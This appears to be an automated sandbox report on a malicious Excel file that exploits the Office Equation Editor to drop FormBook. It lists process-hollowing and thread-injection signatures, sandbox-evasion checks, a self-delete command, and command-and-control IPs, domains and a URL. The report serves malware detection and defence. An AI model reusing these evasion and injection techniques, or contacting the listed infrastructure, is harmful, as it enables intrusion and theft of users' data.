          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_722F4225 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$QTN3C2AF414EDF9_041873.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBB.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: QTN3C2AF414EDF9_041873.xlsxVirustotal: Detection: 33%
          Source: QTN3C2AF414EDF9_041873.xlsxReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: QTN3C2AF414EDF9_041873.xlsxStatic file information: File size 2421248 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: QTN3C2AF414EDF9_041873.xlsxInitial sample: OLE indicators vbamacros = False
          Source: QTN3C2AF414EDF9_041873.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: z9ayiyo.dll.4.drStatic PE information: section name: .code
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E32F60 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004160D8 push ebp; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C96C push cs; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3B5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B46C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B402 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B40B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C40D push esi; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C485 push FFFFFFC3h; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415CA3 push edx; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CFC1 pushfd ; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004187D8 push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DDFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004160D8 push ebp; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B3B5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B46C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B402 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B40B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C40D push esi; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C485 push FFFFFFC3h; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004187D8 push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C96C push cs; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00415CA3 push edx; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CFC1 pushfd ; retf
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000960D8 push ebp; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B40B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009C40D push esi; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B402 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B46C push eax; ret
          Source: initial sampleStatic PE information: section name: .data entropy: 7.7471273442

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\z9ayiyo.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dllJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]Jump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]Jump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: QTN3C2AF414EDF9_041873.xlsxStream path 'EncryptedPackage' entropy: 7.99993012299 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2792Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1616Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004065C1 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000006.00000000.2168448795.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2183431407.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2183466751.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2183431407.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2165759515.000000000058D000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.2168570646.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B20 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_722F478F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_722F458C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008C0080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008C00EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 103.251.44.218 80
          Source: C:\Windows\explorer.exeNetwork Connect: 191.96.163.202 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.57.196.177 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.61.250 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 1A0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2168448795.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Spearphishing Link1Native API1Path InterceptionAccess Token Manipulation1Masquerading121OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsProcess Injection512Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer15Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerProcess Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncSystem Information Discovery14Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 356571 Sample: QTN3C2AF414EDF9_041873.xlsx Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for dropped file 2->57 59 14 other signatures 2->59 10 EQNEDT32.EXE 13 2->10         started        15 EXCEL.EXE 37 19 2->15         started        process3 dnsIp4 49 algreenstdykeghestqw.dns.army 103.140.251.164, 49168, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->49 51 ow.ly 54.67.57.56, 49167, 80 AMAZON-02US United States 10->51 37 C:\Users\user\AppData\Local\...\winlog[1], PE32 10->37 dropped 39 C:\Users\Public\vbc.exe, PE32 10->39 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->79 17 vbc.exe 19 10->17         started        41 C:\Users\...\~$QTN3C2AF414EDF9_041873.xlsx, data 15->41 dropped file5 signatures6 process7 file8 33 C:\Users\user\AppData\Local\...\z9ayiyo.dll, PE32 17->33 dropped 35 C:\Users\user\AppData\Local\...\System.dll, PE32 17->35 dropped 61 Multi AV Scanner detection for dropped file 17->61 63 Detected unpacking (changes PE section rights) 17->63 65 Machine Learning detection for dropped file 17->65 67 2 other signatures 17->67 21 vbc.exe 17->21         started        signatures9 process10 signatures11 69 Modifies the context of a thread in another process (thread injection) 21->69 71 Maps a DLL or memory area into another process 21->71 73 Sample uses process hollowing technique 21->73 75 Queues an APC in another process (thread injection) 21->75 24 explorer.exe 21->24 injected process12 dnsIp13 43 athara-kiano.com 103.251.44.218, 49170, 80 IDNIC-JALANET-AS-IDPTJupiterJalaArtaID Indonesia 24->43 45 www.fashionwatchesstore.com 104.21.61.250, 49169, 80 CLOUDFLARENETUS United States 24->45 47 6 other IPs or domains 24->47 77 System process connects to network (likely due to code injection or exploit) 24->77 28 ipconfig.exe 24->28         started        signatures14 process15 signatures16 81 Modifies the context of a thread in another process (thread injection) 28->81 83 Maps a DLL or memory area into another process 28->83 85 Tries to detect virtualization through RDTSC time measurements 28->85 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QTN3C2AF414EDF9_041873.xlsx33%VirustotalBrowse
          QTN3C2AF414EDF9_041873.xlsx26%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]100%Joe Sandbox ML
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]36%ReversingLabsWin32.Backdoor.Androm
          C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll0%ReversingLabs
          C:\Users\Public\vbc.exe36%ReversingLabsWin32.Backdoor.Androm

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.vbc.exe.2900000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g0%Avira URL Cloudsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
